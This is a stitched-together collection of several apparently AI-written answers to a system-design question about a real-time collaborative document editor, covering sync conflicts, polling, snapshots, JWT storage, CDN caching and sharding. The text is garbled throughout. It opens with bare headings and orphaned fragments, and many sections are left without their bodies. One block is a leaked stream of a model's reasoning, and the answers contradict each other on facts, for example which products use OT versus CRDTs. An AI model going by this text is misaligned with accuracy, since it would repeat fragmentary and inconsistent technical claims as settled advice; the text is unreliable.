Edge Workers:
Scaling Bottlenecks:
Solutions:
Stateless API Servers with External WebSocket Broker:
Database Connection Pooling:
Failure Modes:
Solutions:
Operational Transformation (OT):
CRDTs (Conflict-Free Replicated Data Types):
Failure Modes:
Solutions:
Multi-Region PostgreSQL:
Regular Backups:
| Issue | Solution | Trade-off |
|---|---|---|
| WebSocket reconnections | Sticky sessions or session tokens | Reduced load balancing flexibility |
| LWW race conditions | HLC or OT/CRDTs | Added complexity |
| Cross-server sync delays | CDC or Redis Pub/Sub | Infrastructure complexity |
| Database bottlenecks | Delta snapshots or sharding | Operational overhead |
| JWT expiry | Short-lived tokens + refresh tokens | Auth flow complexity |
| Redis failures | Multi-layer caching | Increased storage costs |
| CDN stale cache | Cache invalidation headers | Reduced CDN efficiency |
| Horizontal scaling | External WebSocket broker | Added latency/dependency |
| Edit conflicts | OT or CRDTs | Higher implementation complexity |
| Disaster recovery | Multi-region DB + backups | Cost and operational overhead |
This architecture can scale to thousands of concurrent users but requires careful trade-offs between complexity, cost, and consistency.
Here’s a comprehensive analysis of the failure modes, race conditions, and scaling bottlenecks in the proposed architecture, along with specific solutions and trade-offs for each:
/updates?lastSeen=timestamp).
ws:user123:serverId) and allow any server to take over.
/assets/v2/) whenever static files change.
createdAt: ISODate.now()).
Text CRDT for collaborative editing).
version column to the documents table and require UPDATE ... WHERE version = expected_version.
documents table into shards (e.g., documents_shard_1, documents_shard_2) based on document_id % N.
JOIN across shards); requires application-level routing.
maxmemory-policy allkeys-lru.
sessions-shard-1, ws-shard-1).
/assets/* every 5 minutes instead of per file).
stale-while-revalidate to serve stale content while revalidating.
| Issue | Solution | Trade-off |
|---|---|---|
| Offline Editing | Use CRDTs + local storage | Higher client-side complexity |
| Document Locking | Optimistic locking (like Git) | May cause merge conflicts |
| Large Document Edits | Chunked updates (e.g., 1KB at a time) | Higher WebSocket overhead |
| Cross-Region Latency | Multi-region deployment | Data consistency challenges |
| Abusive Users | Rate limiting + IP blocking | May block legitimate users |
The biggest risks in this architecture are:
Trade-offs to consider:
Would you like a deeper dive into any specific area (e.g., OT implementation, Kubernetes scaling, or CRDTs)?
Below is a thorough analysis of the proposed architecture for a real-time collaborative document editor. I've identified 12 critical failure modes, race conditions, and scaling bottlenecks based on the described system. For each issue, I explain the root cause, provide a concrete solution, and detail the trade-offs (including performance, complexity, consistency, and operational impacts). My analysis focuses on practical, production-relevant flaws that would manifest under real-world usage (e.g., network partitions, clock skew, traffic spikes), not just theoretical edge cases.
Failure Mode: The system relies on polling every 2 seconds for inter-server synchronization (Step 4: "Other servers poll PostgreSQL every 2 seconds for changes"). This means:
Solution: Replace polling with a publish/subscribe (pub/sub) mechanism (e.g., Redis Streams or Apache Kafka) for real-time change propagation.
doc:{doc_id}).
- All API servers subscribe to relevant channels and apply changes immediately upon receipt.
Trade-offs:
Failure Mode: The sync strategy uses "last-write-wins with timestamps from client clocks" (Step 5). This is fundamentally unsafe for collaborative editing:
Solution: Implement Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs) with server-generated logical timestamps.
now() or a hybrid logical clock) to eliminate client-clock reliance.
Trade-offs:
- ✅ Pros: Guarantees convergence (all clients see identical state), preserves user intent, and eliminates silent data loss. OT/CRDTs are industry standards for collaborative editors (Google Docs uses OT; Notion uses CRDTs).
Failure Mode: "Each API server maintains its own WebSocket connections to clients" with no failover mechanism. If a server crashes (e.g., due to deploy, OOM, or network partition):
Solution: Decouple WebSocket state from API servers using a shared connection store (e.g., Redis) and stateless WS handlers.
ws:{conn_id} → {user_id, docs}).Trade-offs:
Failure Mode: Step 4 states servers "poll PostgreSQL every 2 seconds for changes." At scale, this creates predictable, avoidable load:
SELECT ... WHERE updated_at > last_poll_time, which:
Solution: Use PostgreSQL’s built-in logical replication (via pgoutput plugin) with a change data capture (CDC) tool (e.g., Debezium) to stream changes to a message queue (e.g., Kafka or Redis Streams).
INSERT/UPDATE/DELETE on the documents table.db.server1.documents).Trade-offs:
Failure Mode: Storing "full HTML snapshots every 30 seconds" (Storage section) causes:
{op: "insert", pos: 42, text: "Hello"}) to the server.Trade-offs:
Failure Mode: Auth uses "JWT tokens with 24-hour expiry, stored in localStorage." This introduces critical security risks:
localStorage and impersonate users indefinitely (until token expiry).Solution: Implement short-lived access tokens + HTTP-only refresh tokens.
Authorization: Bearer header.
/refresh endpoint (cookie-sent automatically).
Never store tokens in localStorage or sessionStorage for auth.
Trade-offs:
- ✅ Pros:
Failure Mode: "CloudFront [...] also caches API responses for 5 minutes" risks serving stale or dangerous data:
GET /doc/{id} (e.g., due to misconfigured Cache-Control headers), a user requesting a doc mid-edit could get:
POST /doc/{id}/edit request is accidentally cached (e.g., if the API returns 200 with body), subsequent GETs might show the pre-edit state until cache expires.
Solution: Explicitly disable caching for all API endpoints and cache only static assets.
Set Cache-Control headers on API responses:
```
Cache-Control: no-store
Pragma: no-cache
Expires: 0
```
Configure CloudFront to:
- Cache static asset paths (e.g., /static/js/*.js, /assets/*) with long TTL (e.g., 1 year).
- Set API paths (e.g., /api/*) to **origin only** (no caching).
Trade-offs:
Failure Mode: The scaling plan mentions "document partitioning by organization ID," which risks severe load imbalance:
Solution: Use hybrid partitioning combining organization ID with document-level hashing.
(organization_id, hash(document_id)) or hash(organization_id || document_id).
hrw or maglev hash ring) to map (org_id, doc_id) to a specific DB shard or cache slot.
{org_id}:{doc_id}) to keep related data on same shard.
- Optional: Add automated rebalancing (e.g., via Kubernetes HPA + custom metrics) to shift load when hotspots emerge.
Trade-offs:
Failure Mode: The architecture assumes constant connectivity (WebSocket → server → PG). If a user loses internet:
Trade-offs:
Failure Mode: Step 2 states: "Server writes change to PostgreSQL" on every WebSocket change event (e.g., per keystroke). This causes:
Solution: Batch changes client-side and use write-behind persistence.
{ops: [...], doc_id: X, version: Y}).
COPY or bulk insert for batches (e.g., every 500ms or 100 ops).
Failure Mode: The system assumes a stable network between clients, API servers, and DB. During a network partition (e.g., AWS AZ outage):
Solution: Design for partition tolerance using a leader-follower DB setup with explicit consistency levels.
Trade-offs:
Failure Mode: The data flow lacks idempotency guarantees for WebSocket messages (Step 1: "User types → change event sent via WebSocket"). If a message is retransmitted (due to WS retry, network glitch, or client reconnect):
Solution: Require client-generated unique IDs for all operations and enforce idempotency server-side.
{id: "uuid", op: "insert", pos: 5, text: "A"}).
(client_id, event_id).
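The server-side dedup described above can be sketched as follows (class and method names are illustrative; a real deployment would bound or expire the seen-set, e.g. in Redis with a TTL):

```javascript
class IdempotentApplier {
  constructor(applyOp) {
    this.applyOp = applyOp;
    this.seen = new Set(); // keys of already-applied operations
  }
  receive(clientId, op) {  // op carries a client-generated unique id
    const key = `${clientId}:${op.id}`;
    if (this.seen.has(key)) return false; // duplicate delivery: drop silently
    this.seen.add(key);
    this.applyOp(op);
    return true;
  }
}
```

This makes WebSocket retries safe: retransmitting the same op is a no-op rather than a double insert.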
This architecture has strong foundations (React frontend, Node.js API, PostgreSQL/Redis) but contains several fatal flaws for real-time collaboration that would manifest under load or failure. The most urgent fixes are:
These changes would transform the system from a fragile prototype into a production-grade collaborative editor. The trade-offs (increased complexity, minor latency) are universally justified by the gains in correctness, scalability, and user experience. For context: Google Docs, Figma, and Notion all use variations of these patterns—there are no shortcuts for real-time collaboration at scale.
If implementing these, prioritize:
Okay, let's tackle this problem. The user provided an architecture for a real-time collaborative document editor and wants me to identify failure modes, race conditions, scaling bottlenecks, and propose solutions with trade-offs. Hmm, where to start?
First, I need to understand the system thoroughly. The frontend is a React SPA using WebSockets. Backend is Node.js with load balancer, PostgreSQL, Redis. Real-time is handled by each API server maintaining WebSocket connections. Sync strategy is last-write-wins with client timestamps. Storage is HTML snapshots every 30 seconds. Auth is JWT in localStorage. CDN for static assets and API caching.
Alright, failure modes. Let's think about possible points of failure. WebSocket connections dropping? That's a problem because real-time sync relies on WebSockets. If a client disconnects, their changes might not get through. Also, if the API server goes down, that's bad. Load balancer failure could route traffic to a dead server. PostgreSQL issues like replication lag or downtime. Redis cache problems affecting session management. CDN cache serving stale data.
Race conditions. Since they use last-write-wins based on client timestamps, if two users edit the same part simultaneously, the timestamps could be off due to clock skew. That's a classic race condition. Also, when servers poll for changes every 2 seconds, there might be conflicts not detected in time. What about when a document is partitioned by organization ID? If a document is being edited across multiple partitions, maybe there's inconsistency.
Scaling bottlenecks. The load balancer is round-robin, but if some servers are handling different documents, maybe uneven load? PostgreSQL might become a bottleneck if all writes go through it and replication lags. Redis could be a bottleneck if many sessions are stored there. WebSocket connections per server limit? If each server has a max number of clients, scaling horizontally might require managing that. Document partitioning might not scale well if some organizations are very large.
Now, for each issue, propose a solution. Let's start with WebSocket failures. If a client disconnects, their changes might be lost. Solution: Maybe implement a message queue (like Kafka or RabbitMQ) to persist changes even if WebSocket drops. Trade-off is added complexity and latency.
API server downtime: Use a load balancer with health checks. If a server is down, LB stops routing traffic. Trade-off is LB needs to be reliable.
PostgreSQL replication lag: When polling every 2 seconds, if replication is slow, servers might not get the latest changes. Solution: Use synchronous replication or a more aggressive polling interval. Trade-off is increased latency or cost.
Redis session cache failures: If Redis is down, sessions might not be tracked. Solution: Use a fallback like localStorage for sessions, but that's less secure. Trade-off is security vs availability.
CDN cache serving stale data: If CDN caches API responses, updates might not propagate immediately. Solution: Invalidate cache on updates. Trade-off is increased CDN cost or complexity.
Real-time sync conflicts: Last-write-wins with client clocks. Clock skew could lead to incorrect conflict resolution. Solution: Use a centralized time source like NTP or logical clocks (Lamport timestamps). Trade-off is added overhead for time sync.
Polling interval causing conflicts: If polling every 2 seconds, changes might be missed. Solution: Reduce polling interval or use WebSockets for all updates. But WebSockets are already used for real-time. Maybe need to handle both? Trade-off is higher server load from more connections.
Document partitioning: If a document is split across partitions, concurrent edits might not sync properly. Solution: Ensure each document is in a single partition. Trade-off is scalability if organizations are large.
Also, JWT stored in localStorage is vulnerable to XSS. If XSS attack, attacker can steal tokens. Solution: Use HttpOnly cookies instead. Trade-off is session management complexity.
Another thing: The sync strategy is last-write-wins. That might lead to data loss if two users overwrite each other's changes. Maybe offer conflict resolution options? Trade-off is user experience vs data integrity.
Scaling the WebSocket connections: Each API server handles its own WebSockets. If a server runs out of connections, clients might not connect. Solution: Use a connection pool or a dedicated WebSocket server. Trade-off is architectural complexity.
Database read replicas: If writes are heavy, read replicas help. But if the primary DB is overwhelmed, writes could be slow. Solution: Sharding the database? But that's complex. Trade-off is increased database management.
So, compiling all these thoughts into a structured list with each issue, solution, and trade-off. Need to make sure each point is specific and addresses the architecture given.
Here's a detailed analysis of potential issues in the architecture, along with solutions and trade-offs:
localStorage is vulnerable to XSS attacks, compromising user sessions.
This architecture is resilient to many failures but requires careful tuning of trade-offs between real-time responsiveness, data consistency, and operational complexity.
Failure Modes and Solutions:
WebSocket Server Failure:
PostgreSQL Write Overload:
Clock Skew in Timestamps:
Race Conditions and Solutions:
Concurrent Edits on the Same Paragraph:
Polling Delay in Server Synchronization:
Scaling Bottlenecks and Solutions:
Load Balancer Round-Robin Distribution:
JWT Token Storage in localStorage:
CDN Caching of API Responses:
By addressing these failure modes, race conditions, and bottlenecks, the architecture can become more robust, scalable, and efficient for real-time collaboration.
This architecture contains several critical flaws that would prevent the application from functioning as a true real-time collaborative editor ("Google Docs" style). The issues range from data corruption risks to severe performance bottlenecks.
Here is a detailed breakdown of the failure modes, race conditions, and scaling bottlenecks, organized by severity.
This is the most severe category. The proposed sync strategy effectively makes true collaboration impossible.
Date.now() from the client browser for conflict resolution.
SELECT * FROM changes every 2 seconds, regardless of whether users are typing.
/api/docs/* endpoints or use strict Cache-Control: no-store headers. CDNs should only cache static assets (JS/CSS/Images).
localStorage makes them vulnerable to Cross-Site Scripting (XSS). If an attacker injects a script, they can steal the token and impersonate the user.
To make this architecture viable, you need to shift from a "Database-centric polling" model to a "Stream-centric push" model.
This architecture for a real-time collaborative document editor has several promising elements (WebSockets, Redis, PostgreSQL, CDN), but it also contains significant flaws in consistency, scalability, and reliability. Below is a comprehensive breakdown of failure modes, race conditions, and scaling bottlenecks, along with specific solutions and their trade-offs.
Recommended: Use CRDTs (Conflict-Free Replicated Data Types) for real-time sync (e.g., Yjs, Automerge). Best for scalability and offline support.
Publish each operation to a per-document channel such as `doc:123:updates`. ✅ Use Redis Pub/Sub for real-time sync; add Kafka for an audit log/event sourcing if needed.
Subscribe servers to per-document channels (e.g., `doc:123`) for efficient routing. ✅ Use Redis Pub/Sub for low-latency sync, and store full history in PostgreSQL for recovery.
Example: Use Yjs (CRDT) on frontend and backend — syncs deltas, not full state.
✅ CRDTs are the modern standard for collaborative editing (e.g., Figma, Google Docs).
✅ Combine: Snapshot every 10 mins + op log. On load: get snapshot + replay recent ops.
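A minimal sketch of that load path, assuming a simple op shape (`insert`/`delete` objects are illustrative, not the original's schema):

```javascript
// Rebuild a document from its last snapshot plus the ops recorded since.
// Ops are plain objects: { type: 'insert', pos, text } or { type: 'delete', pos, len }.
function applyOp(doc, op) {
  if (op.type === 'insert') {
    return doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
  }
  if (op.type === 'delete') {
    return doc.slice(0, op.pos) + doc.slice(op.pos + op.len);
  }
  throw new Error(`unknown op type: ${op.type}`);
}

// On load: start from the snapshot and replay recent ops in order.
function materialize(snapshot, opsSinceSnapshot) {
  return opsSinceSnapshot.reduce(applyOp, snapshot);
}
```

Replaying a handful of ops on top of a recent snapshot keeps load times short even for long documents.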
✅ Best: Use CRDTs with stateless servers — no leader needed.
Keeping JWTs in `localStorage` makes them accessible to client-side scripts → vulnerable to XSS attacks. ✅ Use httpOnly cookies + short-lived JWTs.
Set `Cache-Control: no-store` (or a very short TTL) on document APIs. ✅ Disable CDN caching for all document/editing APIs.
✅ Use Yjs or similar — handles offline, sync, and conflict.
✅ Use Redis as working store, PostgreSQL as cold storage/backup.
Shard by `doc_id` → map to a Redis cluster node or DB shard. ✅ Use Citus or custom sharding by `doc_id`.
✅ Use token bucket rate limiting per user/connection.
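The token-bucket idea above can be sketched as a minimal in-process limiter (a production system would keep the buckets in Redis so all servers share them; the time parameter is injected here purely for testability):

```javascript
// Minimal token-bucket limiter per user/connection. The bucket holds at most
// `capacity` tokens and refills at `refillPerSec`; each op consumes one token.
class TokenBucket {
  constructor(capacity, refillPerSec, nowMs = Date.now()) {
    this.capacity = capacity;
    this.refillPerSec = refillPerSec;
    this.tokens = capacity;
    this.lastMs = nowMs;
  }

  tryConsume(nowMs = Date.now()) {
    // Refill proportionally to elapsed time, capped at capacity.
    const elapsedSec = (nowMs - this.lastMs) / 1000;
    this.tokens = Math.min(this.capacity, this.tokens + elapsedSec * this.refillPerSec);
    this.lastMs = nowMs;
    if (this.tokens >= 1) {
      this.tokens -= 1;
      return true; // op allowed
    }
    return false; // throttle: tell the client to slow down
  }
}
```

Bursts up to `capacity` pass immediately; sustained traffic is held to `refillPerSec` ops per second.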
| Issue | Solution | Trade-off |
|---|---|---|
| Client clock skew | Use CRDTs or server-assigned logical clocks | Complexity ↑ |
| Incomplete real-time sync | Add Redis Pub/Sub between servers | New dependency |
| Polling DB every 2s | Replace with message bus push | Ops complexity ↑ |
| LWW overwrites | Use CRDTs (e.g., Yjs) | Learning curve |
| Full HTML snapshots | Delta + op log + snapshots | Storage ↑, consistency ↑ |
| JWT in localStorage | Use httpOnly cookies | CSRF risk → needs mitigation |
| CDN caching API | Disable for dynamic routes | Higher origin load |
| WebSocket drops | Client queue + ACKs | Offline complexity |
| DB write bottleneck | Redis as write buffer | Risk of Redis data loss |
| No global consistency | CRDTs + message bus | Stateless, scalable |
| Sharding | Shard by doc_id | Cross-shard queries hard |
[Client]
→ (WebSocket + Yjs)
→ API Server
→ Redis (Pub/Sub for real-time, storage for ops)
→ Background Workers → PostgreSQL (persistent storage)
→ Auth via httpOnly JWT cookies
→ CDN only for static assets
This system as described will not work reliably for real-time collaboration due to clock skew, incomplete sync, polling, and destructive conflict resolution.
Fix it by:
With these changes, you can build a scalable, resilient, Google Docs–like system.
Here's a comprehensive analysis of the architecture's failure modes, race conditions, and bottlenecks, with specific solutions and trade-offs:
Failure Mode/Race Condition:
Solution: Operational Transformations (OT) or CRDTs
Trade-offs:
Failure Mode/Race Condition:
Solution: Dedicated Pub/Sub Layer for Real-Time Sync
Publish each change to a `doc:{id}:changes` channel.

Trade-offs:
Failure Mode/Bottleneck:
Solution: Incremental Deltas + Incremental Saves
Send small deltas (e.g., `{"op": "insert", "pos": 12, "chars": "x"}`). Attach a monotonically increasing version number (e.g., `version: 123`) to ensure clients replay deltas in order.

Trade-offs:
Failure Mode:
Solution: HttpOnly Refresh Tokens + Short-Lived Access Tokens
Renew access tokens via `/refresh` (using the refresh-token cookie).

Trade-offs:
Protect the cookie flow with `SameSite=Strict` + an anti-CSRF header.

Bottleneck: With N servers each polling every 2s for all documents, change-check load on the DB grows with server count × document count. At 100 servers issuing 50 QPS each, that is 5,000 QPS for change checks alone.
Solution: Event-Driven Change Propagation (via Pub/Sub, as in #2). Eliminates polling entirely.
Trade-off: Shifts load from DB to Pub/Sub layer (easier to scale than PostgreSQL).
Bottleneck: Org with 10k active users (e.g., "Acme Corp") becomes a hot partition. One PostgreSQL shard handles all Acme's docs → write saturation.
Solution: Composite Sharding Key (org_id + doc_id_hash % 100).
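A sketch of such a composite key; the FNV-1a hash and the 100-sub-shard fan-out are illustrative assumptions, not part of the original design:

```javascript
// Composite shard key: keep an org's docs grouped by prefix while spreading
// its documents across 100 sub-shards so one big org cannot saturate a shard.
function hashString(s) {
  // Small deterministic hash (FNV-1a, 32-bit); any stable hash works here.
  let h = 0x811c9dc5;
  for (let i = 0; i < s.length; i++) {
    h ^= s.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

function shardKey(orgId, docId) {
  return `${orgId}:${hashString(docId) % 100}`;
}
```

The same `(orgId, docId)` pair always maps to the same sub-shard, so routing stays deterministic while hot orgs fan out.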
Trade-off: Cross-doc transactions (e.g., "move doc between orgs") become complex (2PC required).
Bottleneck: CloudFront caches GET responses for 5 mins → stale document reads after edits. User refreshes → sees 5-min-old data.
Solution:
Version document URLs, e.g., `/docs/{id}?v=123`. Set `Cache-Control: no-store` for document-content APIs.

Trade-off: Slightly higher origin load (but protects data consistency).
Failure Mode: Rolling updates disconnect all WebSockets → mass reconnections flood new servers.
Solution:
Failure Mode: Server crashes mid-delta write → partial data in DB.
Solution: Atomic Delta Appends
Use `INSERT ... RETURNING version` to ensure version continuity.

| Issue | Top Solution | Critical Trade-off |
|---|---|---|
| Sync Strategy | OT/CRDTs + server timestamps | Frontend complexity; ~15ms added latency |
| Inter-Server Sync | Redis PubSub for real-time events | Adds SPOF (requires Redis HA) |
| Storage Efficiency | Delta-only persistence + snapshots | Recovery requires delta replay |
| Auth Security | HttpOnly refresh tokens + short JWTs | CSRF protection needed |
| Scaling Hot Orgs | Composite sharding (org_id+doc_id) | Cross-doc ops become distributed transactions |
Final Recommendation: Prioritize OT/CRDTs and PubSub first – they address the highest-risk data loss scenarios. Without these, the system is fundamentally unreliable for concurrent editing. The other fixes (storage, auth, scaling) are critical but secondary to core sync integrity.
The described architecture for a real-time collaborative document editor has several critical failure modes, race conditions, and scaling bottlenecks that compromise consistency, availability, and scalability—especially under load or in edge network conditions. Below is a detailed breakdown of each issue, followed by specific solutions and their trade-offs.
Each server maintains its own WebSocket connections and only broadcasts changes to clients connected to it. Other servers poll PostgreSQL every 2 seconds for changes and then broadcast locally.
This violates the promise of “real-time” collaboration.
Use a distributed pub/sub system (e.g., Redis Pub/Sub, Kafka, or NATS) to synchronize changes instantly across all API servers.
Each server subscribes to per-document channels (e.g., `doc:123:updates`). ✅ Eliminates polling delay → near-instant cross-server sync.
Using client-generated timestamps for conflict resolution is broken due to clock skew.
Use server-assigned timestamps or, better yet, Operational Transformation (OT) or Conflict-Free Replicated Data Types (CRDTs).
✅ Enables true real-time collaboration with no lost edits.
Saving entire HTML snapshots every 30 seconds is dangerous:
✅ Reduces data loss window, supports versioning, undo, and audit trails.
Each server manages its own WebSocket connections → sticky sessions required.
Decouple WebSocket connections from data processing:
✅ Enables horizontal scaling without sticky sessions.
Servers polling DB every 2 seconds for changes:
Replace polling with event-driven push:
Use PostgreSQL `LISTEN/NOTIFY` to get real-time change events. ✅ Eliminates polling → zero overhead when idle.
`LISTEN/NOTIFY` has limitations (payloads capped at roughly 8 KB, asynchronous, best-effort delivery), so pair it with a durable change log. ✅ Enables fault-tolerant recovery.
Caching API responses (e.g., document state) for 5 minutes via CDN:
✅ Ensures users always get latest state.
Storing JWT in localStorage makes it accessible via XSS attacks.
✅ Mitigates XSS-based token theft.
Partitioning by organization ID may cause uneven load:
✅ Better load distribution.
If a client goes offline:
✅ Robust offline support.
| Issue | Solution | Trade-off |
|---|---|---|
| Cross-server sync delay | Redis Pub/Sub or Kafka for real-time broadcast | Adds broker dependency |
| Client clock skew | Server timestamps + CRDTs/OT | Complexity, learning curve |
| Full snapshots → data loss | Delta-based persistence | Harder to query/backup |
| Sticky sessions required | Shared pub/sub (Redis) or gateway | Indirection, latency |
| DB polling overload | PostgreSQL NOTIFY or CDC | Operational complexity |
| CDN caching docs | Disable caching for doc content | Higher backend load |
| JWT in localStorage | HttpOnly cookies + refresh tokens | CSRF risk, more flow |
| No offline support | Client-side op queue + catch-up | Storage, logic overhead |
| Hotspot partitioning | Document ID sharding | Cross-shard queries hard |
Replace polling with `LISTEN/NOTIFY` or CDC.

By addressing these issues, the system evolves from a fragile, inconsistent prototype into a scalable, fault-tolerant, real-time collaborative editor capable of supporting thousands of concurrent users with strong consistency and minimal data loss.
Here's a comprehensive breakdown of critical flaws in this architecture, along with specific solutions and trade-offs. The most severe issues relate to the sync strategy and data flow, which would cause catastrophic data loss and inconsistent states in real-world use.
- **Cross-server sync:** On each edit, `PUBLISH doc:<id> "<operation>"` so every server rebroadcasts instantly.
- **Out-of-order polling:** `SELECT * FROM changes WHERE ts > last_poll` may return edits out of order.
- **Message ordering:** Tag each operation with a `server_id:counter` identifier (e.g., `server-3:142`).
- **Hot partitions:** Partitioning by `organization_id` creates hot partitions (e.g., a large company with 10k concurrent editors on one doc). Shard on `(organization_id, shard_id)` where `shard_id = hash(document_id) % 1024`.
- **Token theft:** `localStorage` is accessible via JavaScript → XSS attacks steal tokens. Use `HttpOnly`, `SameSite=Strict`, `Secure` cookies (plus anti-CSRF tokens).
- **Stale caches:** Set `Cache-Control: no-store, must-revalidate` on all document-related API responses.
- **Sticky sessions:** Enable session affinity at the load balancer (`sticky: true` in Nginx, ALB target-group stickiness).

| Issue | Priority | Fix | Why Critical |
|---|---|---|---|
| Client LWW | 🔴 CRITICAL | OT/CRDTs + logical clocks | Prevents constant data loss & divergence |
| Polling bottleneck | 🔴 CRITICAL | Redis Pub/Sub | Eliminates 2s latency & DB overload |
| Full HTML snapshots | 🟠 HIGH | Kafka + diff-based storage | Solves write saturation, reduces storage 90%+ |
| JWT in localStorage | 🟠 HIGH | HttpOnly cookies + short tokens | Prevents mass account takeovers |
| No message ordering | 🔵 MEDIUM | Lamport timestamps | Required for OT/CRDTs to work correctly |
Without OT/CRDTs and Pub/Sub, this system is fundamentally broken for collaboration – it will lose data under even light concurrent usage. Start by replacing LWW and polling, then address storage/performance. The proposed solutions align with industry standards (Google Docs uses OT; Figma uses CRDTs). While they add complexity, they’re necessary for correctness – collaboration correctness trumps simplicity.
Your real-time collaborative document editor architecture is well-structured for a scalable, low-latency system — but it contains several critical failure modes, race conditions, and scaling bottlenecks that could degrade user experience or cause data loss. Below is a detailed analysis of each issue with specific solutions and trade-offs.
| Pros | Cons |
|---|---|
| Real-time sync across servers | Adds dependency on Redis; increased complexity |
| Low latency (~100ms) | Higher operational cost due to pub/sub traffic |
| Eliminates polling delays | Risk of message duplication (handle idempotency) |
✅ Implementation Tip: Use Redis Streams instead of simple Pub/Sub for better message durability and consumer-group management.
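The duplicate-delivery risk noted in the table can be handled with an idempotency check; this is a hedged sketch where the op IDs and the retention cap are assumptions:

```javascript
// Idempotent broadcast: remember recently seen op IDs so a duplicated
// pub/sub delivery is applied at most once per server.
function makeDeduper(maxRemembered = 10000) {
  const seen = new Set();
  return function isFirstDelivery(opId) {
    if (seen.has(opId)) return false; // duplicate: skip
    seen.add(opId);
    if (seen.size > maxRemembered) {
      // Evict the oldest entry (Sets iterate in insertion order).
      seen.delete(seen.values().next().value);
    }
    return true;
  };
}
```

Each server calls the returned function before broadcasting, so replays from the broker become harmless.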
Use server-assigned identifiers (Lamport timestamps, `uuidv1`, or incrementing counters per document).

| Pros | Cons |
|---|---|
| Deterministic, reliable ordering | Requires changes to data model and client logic |
| Eliminates clock skew issues | CRDTs increase payload size (metadata overhead) |
| Can enable true real-time merging | Learning curve for developers |
✅ Recommended: Start with Lamport timestamps + server-side validation, then migrate to CRDTs (like Yjs) for richer collaboration.
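The Lamport-clock rules recommended above amount to two one-line functions:

```javascript
// Lamport clock: a logical counter that orders events without wall clocks.
// Tick on every local event; on receive, jump past the sender's clock.
function tick(localClock) {
  return localClock + 1;
}

function receive(localClock, remoteClock) {
  return Math.max(localClock, remoteClock) + 1;
}
```

Because `receive` always moves past both clocks, causally related edits get strictly increasing counters regardless of clock drift.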
Servers `LISTEN` on the document table via triggers. A trigger fires `NOTIFY document_updated, 'doc_id'`, which wakes the `pg_notify` listeners.

| Pros | Cons |
|---|---|
| Near-zero latency notification | Requires active listeners (add complexity) |
| Zero polling overhead | Single point of failure if listener dies |
| Efficient for high-frequency events | Needs monitoring & restart mechanisms |
✅ Bonus: Combine with Redis Pub/Sub as fallback if PostgreSQL notification drops occur.
| Pros | Cons |
|---|---|
| Even distribution across servers | Harder to implement; more stateful |
| Avoids hotspots | Requires complex routing logic |
| Scales better over time | Increased latency for cross-shard ops |
✅ Alternative: Use multi-tier sharding: org_id → tenant shard → document hash within shard.
| Pros | Cons |
|---|---|
| Minimizes network/data usage | Complex delta merging logic |
| High fidelity, low bandwidth | Can lead to bloat if not cleaned up |
| Enables undo/redo | Higher CPU/memory on server/client |
✅ Better Choice: Use Yjs (CRDT-based) for efficient, conflict-free editing at scale.
Don't keep tokens in `localStorage`. Buffer unsynced edits in IndexedDB until:
- The session is restored via a `/refresh` endpoint with a long-lived refresh token (stored securely in an HTTP-only cookie, not `localStorage`).
|---|---|
| Survives network/auth outages | Adds complexity to client-side state management |
| Prevents data loss | IndexedDB limits vary by browser |
| Seamless reconnection | Risk of stale edits if not properly deduplicated |
✅ Critical: Never trust `localStorage` for sensitive tokens. Use HttpOnly cookies + CSRF protection for session integrity.
The CDN caches document endpoints (e.g., `/docs/:id`) for 5 minutes. Instead, set `Cache-Control: no-cache, must-revalidate` on dynamic APIs and invalidate by `doc_id`.

| Pros | Cons |
|---|---|
| Fresh content always served | Reduced CDN efficiency |
| Real-time accuracy | More API requests hitting origin |
| Fast cache invalidation | Costly if done too often |
✅ Best Practice: Cache only immutable static assets. Keep dynamic endpoints uncached or short-lived.
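That best practice can be sketched as a header-selection helper; the path prefixes here are illustrative assumptions:

```javascript
// Choose the Cache-Control header by route class: long-lived for fingerprinted
// static assets, no-store for anything document-related.
function cacheControlFor(path) {
  if (path.startsWith('/static/') || path === '/favicon.ico') {
    return 'public, max-age=31536000, immutable'; // safe: content-addressed assets
  }
  if (path.startsWith('/api/')) {
    return 'no-store'; // never let the CDN serve stale document state
  }
  return 'no-cache'; // default: always revalidate with the origin
}
```

Wiring this into the response pipeline keeps the caching policy in one place instead of scattered per route.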
| Pros | Cons |
|---|---|
| High availability | Higher cost and operational complexity |
| Fault tolerance | More difficult to debug |
| Self-healing | Latency spikes during failover |
✅ Use Case: Redis Sentinel or Redis Cluster depending on scale and budget.
| Issue | Solution | Trade-off |
|---|---|---|
| Cross-server sync delay | Redis Pub/Sub + Notify | Added complexity, cost |
| Client clock timestamp attacks | Server-generated Lamport/UUID | Payload increase, logic change |
| Frequent DB polling | PostgreSQL LISTEN/NOTIFY | Listener maintenance, failure handling |
| Hot partitions | Dynamic sharding (hash-based) | Routing complexity |
| Delta loss during downtime | Client-side edit buffering | Storage overhead, deduplication logic |
| JWT expiry causing disconnect | Refresh tokens + IndexedDB buffer | Security risks if misused |
| CDN caching stale content | Cache control + Tag-based invalidation | Reduced CDN savings |
| Redis single-point failure | Redis Cluster + fallback to DB | Operational cost |
By addressing these issues systematically, your system can evolve from a “good enough” prototype into a production-grade, highly available, real-time collaborative editor capable of serving thousands of concurrent users without data loss or noticeable lag.
Here are the critical issues I've identified in this architecture:
Problem: When an API server crashes or restarts, all WebSocket connections are lost, and clients won't know about changes processed by that server.
Solution:
Trade-offs: Increased complexity vs. guaranteed message delivery
Problem: Client-generated timestamps for conflict resolution are unreliable due to clock drift, leading to inconsistent conflict resolution.
Solution:
Trade-offs: Slightly higher latency vs. correct ordering guarantees
Problem: Server A processes change, broadcasts to its clients, but Server B's 2-second poll hasn't occurred yet, so Server B's clients see stale data.
Solution:
Trade-offs: More complex infrastructure vs. real-time consistency
Problem: Client makes change, reads document before change is committed to database, seeing stale data.
Solution:
Trade-offs: Increased memory usage vs. consistency guarantees
Problem: Every change writes to PostgreSQL, and polling creates read pressure. Full HTML snapshots every 30 seconds are expensive.
Solution:
Trade-offs: More complex data model vs. database scalability
Problem: Each server only broadcasts to its own connected clients, creating inconsistent views during cross-server collaboration.
Solution:
Trade-offs: Additional infrastructure vs. global consistency
Problem: 5-minute CDN caching conflicts with real-time collaboration needs.
Solution:
Trade-offs: Reduced cache efficiency vs. real-time accuracy
Problem: JWT in localStorage is vulnerable to XSS attacks.
Solution:
Trade-offs: Slightly more complex auth flow vs. security
Problem: Last-write-wins can lose data when multiple users edit simultaneously.
Solution:
Trade-offs: Significant complexity increase vs. data integrity
